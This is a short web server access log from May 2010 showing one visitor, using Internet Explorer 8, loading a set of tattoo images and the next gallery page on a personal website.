173.16.115.207 - - [01/May/2010:23:28:22 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
173.16.115.207 - - [01/May/2010:23:28:23 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
173.16.115.207 - - [01/May/2010:23:28:23 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
173.16.115.207 - - [01/May/2010:23:28:23 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
173.16.115.207 - - [01/May/2010:23:28:23 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
173.16.115.207 - - [01/May/2010:23:29:22 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
